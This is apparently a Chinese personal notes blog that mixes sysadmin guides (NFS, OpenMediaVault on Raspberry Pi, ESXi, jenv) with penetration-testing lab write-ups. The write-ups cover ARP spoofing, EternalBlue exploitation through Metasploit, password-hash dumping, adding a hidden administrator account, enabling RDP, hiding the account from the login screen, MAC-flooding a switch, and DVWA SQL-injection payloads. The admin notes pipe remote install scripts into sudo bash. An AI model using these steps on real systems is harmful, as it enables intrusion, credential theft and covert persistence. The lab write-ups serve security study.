exportfs -r

image-20230508152209456

查看默认权限

1
exportfs -v

image-20230508152254228

显示NFS服务器的共享信息

1
showmount -e

image-20230508152331011

win10挂载nfs共享目录

先打开控制面板,找到程序

image-20230508152719331

点击启用或者关闭windows功能

image-20230508152753361

把nfs服务全选上

image-20230508152913031

然后确认退出,打开此电脑找到映射网络驱动器

image-20230508152644711

按照\\ip\共享目录名字这样的格式

image-20230508153030562

然后就能看到共享的文件了

image-20230508153203212

由于上面在/etc/exports里没有添加权限使用仅有下载功能,硬盘的大小还不能完全支配

image-20230508153328881

卸载挂载。。。懂?

image-20230508154432995

linux挂载nfs共享目录

很简单。。。知道怎么挂载磁盘吧。。。就是这样

1
mount ip:/data /服务器的本地文件夹

临时挂载很不方便,你懂的!!!重启就没了,可以试一下永久挂载,这里就不BB了

卸载挂载

1
umount /服务器的本地文件夹

权限修改

rw

1
/data *(rw)
1
2
exportfs -r
exportfs -v

image-20230508160434284

拉个文件进去,它说哒咩!!!

image-20230508155738554

这怎么回事捏,我可是win10的主人,居然没有权限访问?

好吧!虽然是win10的主人,但是linux层面上你只是一个来宾,所以还要在文件夹授予其他用户权限

1
chmod o+rw /data/

image-20230508160220572

嘿嘿!给了权限就可以上传了

image-20230508160209860

权限选择 权限的作用
ro 只读
rw 读写
async 异步,先将数据写入到内存,在将数据写入到硬盘(性能高)
root_squash 将客户端使用的是root用户时,则映射到NFS服务器的用户为NFS的匿名用户(nfsnobody)
no_root_squash 将客户端使用的是root用户时,则映射到FNS服务器的用户依然为root用户
all_squash 默认选项,将所有访问NFS服务器的客户端的用户都映射为匿名用户,不管客户端使用的是什么用户
anonuid 设置映射到本地的匿名用户的UID(配合all_squash使用)
anongid 设置映射到本地的匿名用户的GID(配合all_squash使用)
sync 默认选项,保持数据同步,数据同步写入到内存和硬盘
secure NFS客户端必须使用NFS保留端口(通常是1024以下的端口),默认选项
insecure 允许NFS客户端不使用NFS保留端口(通常是1024以上的端口)

OpenMediaVault

https://www.openmediavault.org/

OpenMediaVault | 镜像站使用帮助 | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror

换源(树莓派5)
1
2
3
4
5
6
7
8
9
10
11
cat >/etc/apt/sources.list<<EOF
# 清华源
deb https://mirrors4.tuna.tsinghua.edu.cn/debian/ bookworm main contrib non-free non-free-firmware
#deb-src https://mirrors4.tuna.tsinghua.edu.cn/debian/ bookworm main contrib non-free non-free-firmware
deb https://mirrors4.tuna.tsinghua.edu.cn/debian/ bookworm-updates main contrib non-free non-free-firmware
#deb-src https://mirrors4.tuna.tsinghua.edu.cn/debian/ bookworm-updates main contrib non-free non-free-firmware
deb https://mirrors4.tuna.tsinghua.edu.cn/debian/ bookworm-backports main contrib non-free non-free-firmware
#deb-src https://mirrors4.tuna.tsinghua.edu.cn/debian/ bookworm-backports main contrib non-free non-free-firmware
deb https://mirrors4.tuna.tsinghua.edu.cn/debian-security bookworm-security main contrib non-free non-free-firmware
#deb-src https://mirrors4.tuna.tsinghua.edu.cn/debian-security bookworm-security main contrib non-free non-free-firmware
EOF
网络修复
这个是我的特殊需求!你们别用!
1
2
3
4
cat >add_route.sh<<EOF
#! /bin/bash
sudo ip route add default via 192.168.200.1 dev wlan0 proto dhcp metric 99
EOF
1
chmod +x add_route.sh
zt
1
curl -s https://install.zerotier.com | sudo bash

自己加入自己的zt网络

安装
  • 注意

安装omv需要无头树莓派,也就是无桌面化的树莓派才行,所以千万别装有桌面化的镜像!!!我是安装树莓派5的64bit lite版本,后面装桌面应该也可以,但是我不会装的

image-20231224215907560

前期部署
  • 设置root密码

omv装好后会把用户一切权限禁用,从而导致用户没办法登录ssh,如果root管理员没有设置密码和开启允许root管理员ssh登录,那就完蛋了!

1
2
3
4
root@R5:~# passwd
New password:
Retype new password:
passwd: password updated successfully
  • 允许root管理员ssh登录
1
2
3
root@R5:~# nano /etc/ssh/sshd_config
#在里面加入这句
PermitRootLogin yes
  • 重启ssh服务
1
root@R5:~# systemctl restart sshd
  • 提前解析raw.githubusercontent.com的ip

反向解析最近能用ip网站

在中国玩服务器百分之九十的问题都来自网络!而世界上最大的同性交流网站gayhub(github)经常被,所以学多点骚操作很有必要

1
2
# 通过上面解析出来的ip
echo "185.199.111.133 raw.githubusercontent.com" >> /etc/hosts
  • 安装个救命的网络包
1
apt-get install network-manager

因为安装omv会导致无线网卡直接关闭,而树莓派5很特殊,用平常的改文件没办法让它连上wifi的,这个安装包里面有个叫nmtui的命令超级好用!

我的树莓派是双网卡连接模式,所以我知道这个坑!使用单网卡而且用的是网口当我没说

一键安装脚本
1
wget -O - https://raw.githubusercontent.com/OpenMediaVault-Plugin-Developers/installScript/master/install | sudo bash
面板设置
  • 账号:admin
  • 密码:openmediavault

image-20231224203714581

image-20231224233310464

image-20231224233431216

image-20231224233459808

image-20231224233758795

image-20231224233818742

image-20231224233917785

image-20231224233952330

image-20231224234040032

image-20231224234151290

image-20231224234258984

image-20231224234321072

image-20231224235034120

image-20231224235055339

image-20231224235643001

特殊待遇

我这边有特殊需求,要手机设备和内网设备可以连接nas,其他全部拒绝访问nas,所以有了这个配置

  • 除了192.168.0.0/24和192.168.200.108该ip设备,其他一并拒绝,有密码也没用
  • samba我还是很不放心的,虽然已经开启smb3.0,但是我曾经用其他舍友的电脑直接无密码登进去了,就让我对nas设备产生了安全顾虑!
  • 后面有新的安全内容也会进行添加
1
2
3
4
root@R5:~# vim /etc/samba/smb.conf
# 用户配置加入这个
hosts allow = 192.168.0.0/24 192.168.200.108
hosts deny = ALL
修复

WEB无法登陆的问题

1
2
3
4
5
6
7
sudo vim /etc/php/8.2/fpm/php.ini

# 添加这个
session.save_path = “/tmp”

# 重启服务
service php8.2-fpm restart

k3s

1
sudo nano /boot/cmdline.txt
1
cgroup_memory=1 cgroup_enable=memory

ansible

esxi

ESXI 挂载U盘

image-20241008141317906

先进ssh里,这个时候别插u盘

1
2
3
4
#  执行下面两条命令
/etc/init.d/usbarbitrator stop

chkconfig usbarbitrator off

插入 USB 硬盘

1
2
# 执行就能看到设备
esxcli storage core device list |grep -i usb

在WEB就能这样看

image-20241008141714748

raspberry python 控 GPIO

python添加gpiozero库

raspberry python 与树莓派硬件交互

python添加psutil库、OS库、commands库、subprocess库

版本切换工具篇

JENV管理JDK

jdk全称”Java Development Kit“,指的是Java语言的软件开发工具包,主要用于移动设备、嵌入式设备上的java应用程序的开发。jdk是java开发的核心,包括了JRE(Java运行环境)运行时类库、JVM(Java虚拟机)。

一般,我们需要用到基于Java虚拟机的操作服务时,需要有JDK的环境,这样的Java有两个特点(Write once, run anywhere):

  • 易于移植:只需要有Java的虚拟机(JDK)环境,即可运行Java程序。
  • 需要平台有Java虚拟机支持:Java程序有所限制,需要有Java环境支持

大部分程序开发者,或者普通用户,都有了解过JDK的配置。但是:

  • Linux服务器上怎么配置JDK呢?
  • 能否实现多版本JDK同时配置安装呢?

本次教程,就在Linux(ubuntu系统)上安装多版本JDK,并使用Jenv管理JDK。

安装思路

常规(传统)安装

我们通常安装JDK是:

  • Centos系统使用yum包管理器安装/Ubuntu使用apt包管理器安装,然后直接使用。
  • 上传源码包、解压源码包、在环境变量文件中追加JAVA_HOME然后source重载配置后使用。

前卫安装

在前面常规(传统)安装的前提下,追加Jenv的配置,实现JDK的切换:

确定使用OpenJDK和JDK的版本之后,使用ZuluJDK(一个OpenJDK的发行版本)

安装JDK8
1
2
3
4
5
6
# wget 下载源码包
root@VM-4-12-ubuntu:~# wget https://cdn.azul.com/zulu/bin/zulu8.66.0.15-ca-jdk8.0.352-linux_x64.tar.gz
# 创建源码包保存目录
root@VM-4-12-ubuntu:~# mkdir /JDK
# 解压源码包至保存目录
root@VM-4-12-ubuntu:~# tar -xzvf zulu8.66.0.15-ca-jdk8.0.352-linux_x64.tar.gz -C /JDK/
1
2
3
4
5
6
7
# 配置JAVA_HOME
root@VM-4-12-ubuntu:~# vim .bashrc
# JAVA环境变量配置
JAVA_HOME=/JDK/jdk8
CLASSPATH=$JAVA_HOME/lib/
PATH=$PATH:$JAVA_HOME/bin/
export PATH JAVA_HOME CLASSSPATH
1
2
# 重载配置
root@VM-4-12-ubuntu:~# source ~/.bashrc
1
2
3
4
5
# 查看版本(JDK1.8就是JDK8)
root@VM-4-12-ubuntu:~# java -version
openjdk version "1.8.0_352"
OpenJDK Runtime Environment (Zulu 8.66.0.15-CA-linux64) (build 1.8.0_352-b08)
OpenJDK 64-Bit Server VM (Zulu 8.66.0.15-CA-linux64) (build 25.352-b08, mixed mode)

多版本JDK管理

安装JENV

Jenv项目地址

1
2
# 使用git下载jenv源码到用户目录下的.jenv文件夹
root@VM-4-12-ubuntu:~# git clone https://github.com/jenv/jenv.git ~/.jenv
1
2
3
4
5
# 配置环境变量
root@VM-4-12-ubuntu:~# vim .bashrc
# Jenv配置环境变量
export PATH="$HOME/.jenv/bin:$PATH"
eval "$(jenv init -)"
1
2
# 重载配置(会出现“jenv has been updated, process to refresh plugin links”这句话,说明配置成功)
root@VM-4-12-ubuntu:~# source ~/.bashrc

现在jenv就可以使用了:

1
root@VM-4-12-ubuntu:~# jenv help

切换JDK

1
2
# 查看当前安装的JDK版本
root@VM-4-12-ubuntu:~# jenv versions
1
2
# 局部JDK11
root@VM-4-12-ubuntu:~# jenv local 11
1
2
# 全局JDK11
root@VM-4-12-ubuntu:~# jenv global 11

管理JDK

有时候,jenv的add扫描,扫描的内容过多怎么办呢?比如,我只添加了JDK8、JDK11,怎么会有这么多版本JDK:

1
2
3
4
5
6
7
8
9
root@VM-4-12-ubuntu:~# jenv versions
* system (set by /root/.jenv/version)
11
11.0
11.0.17
1.8.0.352
1.8
1.8.0.352
zulu64-1.8.0.352

这个时候也很简单,使用remove命令即可:

1
2
root@VM-4-12-ubuntu:~# jenv remove zulu64-1.8.0.352
root@VM-4-12-ubuntu:~# jenv remove 1.8
1
2
3
4
root@VM-4-12-ubuntu:~# jenv versions
system
11.0.17
* 1.8.0.352 (set by /root/.jenv/version)

NVM管理Node.js

[toc]

渗透 and web

渗透

ARP攻防

ARP欺骗

ARP即地址解析协议,在知道目标主机IP地址的情况下,如果需要得到目标知道的MAC地址,ARP协议即可以达到。如果该协议被恶意地对网络进行攻击,其后果是非常严重的。

ARP通常包括两个协议包,一个ARP请求包与一个ARP回应包,请求包如图2.37所示,ARP请求包是一个广播包,在ARP请求包中,源主机发出“Who has 192.168.1.2? Tell 192.168.1.128”。

如图:

1

在ARP应答包中,源主机接收到目标主机发过来的应答包,“192.168.1.2 is at 00:50:56:ef:93:1d”,非常明了,也就是PC机192.168.1.2的MAC地址为00:50:6:ef:93:1d。常见的ARP欺骗有网关欺骗与主机骗两种:

  • 一种是对路由器ARP表的欺骗

    ARP欺骗的原理是截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。

  • 第二种是对内网PC的网关欺骗

    第二种ARP欺骗的原理是伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,网络掉线了。

ARP欺骗工具

arpspoof是一款ARP欺骗工具,下面通过实验演示ARP欺骗,实验环境为攻击者为kali系统,IP地址为192.168.1.129,靶机为Windows 10,其IP地址为192.168.1.128,具体操作过程如下所示:

在kali系统中安装dsniff 嗅探工具:

1
apt install dsniff 

安装完成之后我们可以使用arpspoof命令来攻击靶机(192.168.1.128)

然后我们在VMware Workstation里面的【菜单栏】里面点击【编辑】向下找到【虚拟网络编辑器】,进到里面调配网络段使两台电脑在同一个局域网内。

进入【虚拟网络编辑器】之后点击【VMnet8】然后点击右下角的【更改设置】获取管理员权限,然后把左下角的子网ip更改为【192.168.1.0】,然后点击【确定】,然后两台设备(攻击者kali主机和靶机都在同一个局域网内了)

2

在win10主机里面:

我们在控制面版里面找到【window Defender 防火墙】,点击进去后在左边找到【启用或者关闭 window Defender 防火墙】,把win10的防火墙全部关闭,便以我们接下来的实验。

3

4

我们首先打开攻击者kali系统,对局域网内的网段进行一次全局扫描来获取靶机的目标ip

打开kali后,右击桌面点击【Open Terminal Here】打开命令窗口。

在命令窗口输入:

1
nmap -sP 192.168.1.0/24

5

(kali㉿kali)-[~/Desktop]
└─$ nmap -sP 192.168.1.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-03 05:25 EDT

Nmap scan report for 192.168.1.2 # 这个是网关ip
Host is up (0.00059s latency).
Nmap scan report for 192.168.1.128 # 这个是靶机ip
Host is up (0.0036s latency).
Nmap scan report for 192.168.1.129 # 这个是kali的ip
Host is up (0.0020s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.77 seconds

然后获取我们局域网内的地址

1
route

kali㉿kali)-[~/Desktop]
└─$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.2 0.0.0.0 UG 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0

通过上下对比,可以确定网关IP是192.168.1.2,靶机ip是192.168.1.128,那么前期的信息采集完成,我们接下来对目标靶机进行arp攻击。

1
sudo arpspoof -i eth0 -t 目标ip 主机ip(路由器)      #-i是指定网卡攻击,可以用ifconfig命令查看网卡 

这里我们使用这个命令

1
sudo arpspoof -i eth0 -t 192.168.1.128 192.168.1.2

6

这个时侯的win10还能愉快的上网

7

但是攻击命令按下去后,想打开网页都成为一种奢望

8

取消kali的arp攻击(ctrl + c)后,win10的网络恢复正常

9

我们来对比一下没被攻击前的win10的arp表和被攻击后的arp表的变化

  • 没被攻击前

10

  • 被攻击后

11

没攻击前的路由mac地址是【00-50-56-ef-93-1d】,被攻击后路由mac地址变成了【00-0c-29-c7-25-1a】

并且,还有一个特别有趣的地方就是【192.168.1.129】的mac地址和网关路由的mac地址完全一致,那么我们可以推断出上面那条攻击命令是把攻击者kali的mac替换了网关路由的mac

防范ARP攻击

虽然上面的攻击手段能达到断网、欺骗等效果,但是arp攻击已经是几十年的手段了,它有着种种局限性,例如:ARP攻击仅能在以太网进行,无法对外网进行攻击。

用命令完成防御

原理:在上面我们知道arp工作原理是不断发送欺骗信息来对我们的arp变进行修改,那么我们可以使用手动配置的arp静态表来防止别人的arp欺骗攻击。(但是,静态配置的对不同的环境有着不好的兼容性,也就是说换一个地方工作,我们又要重新配一次静态arp,这样就会很麻烦,第二种办法则很好的解决这种问题,而且对新人非常友好。)

1、Win10以管理员身份运行cmd命令提示符
我们可以在Windows10系统的开始菜单上,单击鼠标右键,这时候出现的菜单中,我们选择命令提示符(管理员)点击打开这样即可。
2、首先,我们查询本地连接的网卡ID号

运行命令:

1
netsh i i show in

如下图所示:

12

从上图可以知道,“Internet”的网卡ID为15,注意是我们需要的是Idx一栏而不是Met

接下来用命令:arp -a来获取网关路由的ip地址和mac地址

3、绑定
在DOS界面运行命令:

1
netsh -c i i add neighbors 15 192.168.1.2 00-50-56-ef-93-1d       (这里的15就是查询到的本地网卡的ID)

13

然后运行命令:arp -a查询是否绑定成功

绑定成功的标志就是右边的【动态】变成了【静态】

14

4、单次解绑
之前通过arp–s方式手动绑定了网关MAC地址,通过arp–d清除该绑定即可。
arp -d 192.168.1.2

5、永久解绑
如过想解除绑定在CMD命令行程序里输入

1
netsh i i reset 

15

不过需要重启才能生效。重启后本地IP地址、网关也要重新设置。

使用软件进行防护

国产软件360安全卫士里面有个实用的功能大全,里面的360流量防火墙可以对您局域网内的设备进行防护,刚入门的小白还是建议使用软件辅助学习会更加事半功倍。

16

永恒之蓝攻击

ms17_010_eternalblue

本次实验有两台设备,Kali Linux(攻击机) ip:192.168.110.132、Windows 7(靶机) ip:192.168.110.133

注意:实验前确认靶机的防火墙已经被关闭

1
2
# 收集目标系统信息
nmap -T4 -A 192.168.110.133

image-20220720013732287

1
2
# 开启msf对靶机进行渗透
msfconsole

image-20220720013841932

1
search ms17-010

image-20220720014154283

首先我们先检查靶机是否能被永恒之蓝所攻击

1
2
3
4
use auxiliary/scanner/smb/smb_ms17_010  #使用模块
set rhosts 192.168.110.133 #设置目标
show options #查看所需参数是否齐全
exploit #执行攻击,和run一样

image-20220720014955490

检测出可以被永恒之蓝攻击,我们调用第一个模块

1
2
3
4
5
6
7
8
9
10
# 切换exploit/windows/smb/ms17_010_eternalblue模块
use exploit/windows/smb/ms17_010_eternalblue
# 切换模块之后,下方有提示说要设置windows/x64/meterpreter/reverse_tcp的载荷
set payload windows/x64/meterpreter/reverse_tcp

# 注入入远程打印机服务进程(这一步要不要都没关系)
set processinject spoolsv.exe
set rhosts 192.168.110.133 #设置目标
show options #查看所需参数是否齐全
exploit #执行攻击,和run一样

image-20220720020217575

win已经成功注入和利用永恒之蓝,接下来我们查看目标ip和其他信息

1
ipconfig

image-20220720020403916

1
2
3
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

image-20220720020446575

找到密码hash,用MD5解密

image-20220720020537658

管理员的密码到手^_^

1
sysinfo   #查看系统信息

image-20220720020857128

也可以用shell直接操控远程cmd

1
shell

image-20220720020649396

进入shell可以给自己创建私人用户,并且授予权限

1
net user julintongxue$ 123456 /add    #创建一个隐藏用户

image-20220720021820959

1
2
3
4
5
6
7
net localgroup administrators julintongxue$ /add    #授予管理员权限
# 输入exit回到控制台,然后hashdump看一下权限
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
julintongxue$:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# 我的权限和管理员的权限一模一样

image-20220720022302734

回到kalilinux主机里面,使用rdesktop远程登陆靶机

1
rdesktop 192.168.110.133

image-20220720022426306

image-20220720022438311

注册表开启3389

如果rdesktop登不进去的话,你得看看你在信息收集的时候,看看靶机的3389端口是否开启!!!

1
2
(输入命令为修改系统注册表,开启 3389 端口)
C:\Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d "0" /f

呵呵,不要学我,你们可以在msf的shell里面修改win7的注册表即可。。。

image-20220721225610024

image-20220721225822146

image-20220721225956759

隐藏不想显示的特定账户在登录界面

这样在人家那边在登录的时候可以看出我们创建的隐藏账号的登录痕迹,即下图:

Snipaste_2022-07-21_22-03-09

我们不可以留这种把柄给别人。。。那么得修改一下注册表,隐藏不想显示的特定账户在登录界面

按住键盘win+r唤出运行,在窗口里输入regedit调出注册表

image-20220721221751469

在打开的注册表编辑器中 依次展开“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”。

image-20220721222142774

image-20220721222254325

image-20220721222347466

鼠标右击Winlogon ,在弹出的菜单中点击 新建-项 输入SpecialAccounts 按回车,鼠标右击SpecialAccounts,再次新建项输入 UserList 。新建完以后如图。

image-20220721222557106

image-20220721222631453

之后鼠标右击 UserList -新建-DWORD值。

image-20220721222738754

输入你要隐藏的账户名称,如果还要添加其它账户,可以再次新建DWORD值即可。现在你可以重启一次电脑看看,账户是不是已经隐藏了。

image-20220721222949327

输入你要隐藏的账户名称,如果还要添加其它账户,可以再次新建DWORD值即可。现在你可以重启一次电脑看看,账户是不是已经隐藏了。

Snipaste_2022-07-21_22-01-47

再狗一点,我们把隐藏账号做成影子账号

dos一下ensp的交换机

本次实验有两台设备,Kali Linux(攻击机) ip:192.168.110.132、Windows 10(靶机) ip:192.168.110.133、Windows 10(靶机)的ensp里面的PC1 ip:192.168.110.130、PC2 ip:192.168.110.131

注意:实验前确认靶机的防火墙已经被关闭

在kali linux(攻击机)上事先安装好dsniff,因为下面要用到dsniff里面的macof泛洪来填满交换机小小的内存,使交换机无法让PC1PC2收发信息

Windows 10(靶机)要提前安装好ensp

kali安装dsniff

1
sudo apt install dsniff

安装完成之后,让所有的机子关闭,在虚拟网络编辑器里面创建VMnet2仅主机模式并且修改子网IP在192.168.110.0即可。

image-20230927163830934

然后Kali Linux(攻击机)、Windows 10(靶机)都接入VMnet2

image-20230927164240231

启动kali和Windows 10(靶机),Windows 10(靶机)打开ensp,按照下图这样设计

image-20230927170102580

然后,这个小云朵要桥接到Windows 10(靶机)的真实网卡接口

image-20230927170221445

PC1PC2直接dhcp算了

image-20230927170705164

让PC1一直 ping PC2,然后看一眼交换机的mac

1
ping 192.168.110.131 -t

image-20230927170856902

这个时候,直接开启kali的最高权限输入macof就可以看到断网现象

下图是交换机被塞得满满的图

image-20230927173759044

交换机直接宕机图

image-20230927173936063

这个图是模拟器有问题,正确的应该是PC1ping不通PC2,然后一段时间后交换机重启又可以ping通,然后又挂。。。

我这个图线路都全挂了还能ping通就极度离谱

image-20230927174200188

WEB

DVWA

安装过程

安装phpstudy
下载DVWA源码
安装需要的依赖库
运行

1.这里把DVWA源码解压到phpstudyWWW目录中,然后修改DVWA的配置文件目录config里面的config.inc.php.dist,将其重命名为config.inc.php

2.编辑config.inc.php文件

1
2
3
# phpstudy的默认用户和密码都是root,所以只需要修改这个即可。
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = 'root';

修改完成之后,重启phpstudy,然后登陆浏览器localhost/DVWA目录名字即可看到网站,然后点击里面的Create/Reset Datebase即可完成。

登录DVWA,默认用户是admin,密码是password

这里有个地方需要小小滴小改一下,那就是难度

登录进去之后找到DVWA Security里面有四个难度,从低到高分别是low、Medium、High、Impossible

SQL注入(手工注入)

low级

首先,判断字符型注入还是数字型注入

1.一般可以通过直接输入单引号来判断是否存在注入点

2.也可以通过输入3和1+2判断注入为字符型注入,若为数字型注入,则3和1+2输出一样

那么我们先输入一个3得到

1
2
3
ID: 3
First name: Hack
Surname: Me

然后输入2+1得到

1
2
3
ID: 2+1
First name: Gordon
Surname: Brown

可以判断出这是字符型注入

字符型注入最关键的是如何闭合SQL语句以及注释多余的代码

SELECT first_name, last_name FROM users WHERE user_id = ‘$id’

  • ‘ or 1=1 or ‘

    SELECT first_name, last_name FROM users WHERE user_id = ‘ ‘ or 1=1 or ‘ ‘

    False or True or False

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    ID: 1' or '1' ='1
    First name: admin
    Surname: admin

    ID: 1' or '1' ='1
    First name: Gordon
    Surname: Brown

    ID: 1' or '1' ='1
    First name: Hack
    Surname: Me

    ID: 1' or '1' ='1
    First name: Pablo
    Surname: Picasso

    ID: 1' or '1' ='1
    First name: Bob
    Surname: Smith
    • 1’ or ‘1’ =’1

      SELECT first_name, last_name FROM users WHERE user_id = ‘1’ or ‘1’ =’1’

      True or True

    • ‘or 1=1 #

      SELECT first_name, last_name FROM users WHERE user_id = ‘’or 1=1 #’

      # 为注释

      False or True

    • ‘or 1=1 – SELECT first_name, last_name FROM users WHERE user_id = ‘’or 1=1 – ‘

      – (有空格)也是注释

      False or True

3.猜SQL查询语句的字段数

  • 1’ order by 2 #
1
2
3
ID: 1' order by 2 #
First name: admin
Surname: admin
  • 1’ order by 3 #
1
Unknown column '3' in 'order clause'

可以判断数据库字段数为2

  • 1’ union select 1,2 #
1
2
3
4
5
6
7
ID: 1' union select 1,2 #
First name: admin
Surname: admin

ID: 1' union select 1,2 #
First name: 1
Surname: 2

4.查询当前用户名和数据库

  • 1’ union select user(),database() #
1
2
3
ID: 查询当前用户名和数据库 1' union select user(),database() #
First name: root@localhost
Surname: dvwa

5.获取数据库中的表

  • 1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1
2
3
ID: 获取数据库中的表 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
First name: 1
Surname: guestbook,users

6.获取表中的字段名

  • 1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=’users’#
1
2
3
ID: 获取表中的字段名 1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
First name: 1
Surname: user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

7.获取字段中的数据

  • 1’ union select user,password from users#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
ID: 获取字段中的数据 1' union select user,password from users#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

ID: 获取字段中的数据 1' union select user,password from users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03

ID: 获取字段中的数据 1' union select user,password from users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

ID: 获取字段中的数据 1' union select user,password from users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

ID: 获取字段中的数据 1' union select user,password from users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
Medium级

driftingblues7_vh

kali ip :

192.168.228.128

靶机 ip :

192.168.228.129

开启driftingblues7_vh,我们先用kali进行一次arp的内网扫描

1
arp-scan 192.168.228.0/24

找到目标ip

image-20220829104221720

利用nmap对靶机进行二次扫描,找靶机开放的服务和端口

1
nmap -A -sV -T4 192.168.228.129

image-20220829104712673

在浏览器打开靶机的web的页面看看

image-20220829105011222

扫描一下靶机web的目录

1
dirb https://192.168.228.129/

image-20220829105454907

我们也可以使用这个来扫描

1
dirsearch -u  https://192.168.228.129/

image-20220829110452593

https://192.168.228.129/bower.json里面可以发现 Eyes Of Network 版本 5.3

1
searchsploit EyesOfNetwork 5.3

image-20220829110917888

我们进入到 msfconsole

image-20220829111055118

查找EyesOfNetwork的漏洞模块

1
search EyesOfNetwork

image-20220829111218183

1
use 0

image-20220829111304610

然后设定靶机IP为192.168.228.129,kali端ip为192.168.228.128

1
2
set rhosts 192.168.228.129
set lhost 192.168.228.128

执行run

image-20220829111741201

1
2
3
4
getuid
cd /root
ls
cat flag.txt

image-20220829111837231

额。。。大无语,就这样结束了!!!

Prime_Series_Level-1

下载地址

解压Prime_Series_Level-1.rar打开虚拟机,kali就绪

扫描c类网段

kali和靶机都在192.168.110.0/24这个段内,直接进行arp扫描

1
2
3
4
5
6
7
8
9
10
# arp-scan 192.168.110.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:91:4e:61, IPv4: 192.168.110.135
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1 00:50:56:c0:00:08 VMware, Inc.
192.168.110.2 00:50:56:fc:59:41 VMware, Inc.
192.168.110.139 00:0c:29:c0:1f:7f VMware, Inc.
192.168.110.254 00:50:56:f3:bc:e9 VMware, Inc.

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.026 seconds (126.36 hosts/sec). 4 responded

可以看出192.168.110.139是目标靶机的ip,为保确认我们用nmap看看它的端口号和系统是不是ubuntu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# nmap -sT -A 192.168.110.139
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-30 22:15 EDT
Nmap scan report for 192.168.110.139
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:C0:1F:7F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.110.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds

由nmap扫描的结果可以知道是ubuntu系统而且开启了22和80端口

浏览器输入靶机ip看看有什么网址。。。

image-20220731102259616

额。。。作者挺喜欢简洁风啊

扫描网址目录地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# dirb http://192.168.110.139                  

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jul 30 22:24:32 2022
URL_BASE: http://192.168.110.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.139/ ----
+ http://192.168.110.139/dev (CODE:200|SIZE:131)
+ http://192.168.110.139/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.110.139/javascript/
+ http://192.168.110.139/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.110.139/wordpress/

---- Entering directory: http://192.168.110.139/javascript/ ----
==> DIRECTORY: http://192.168.110.139/javascript/jquery/

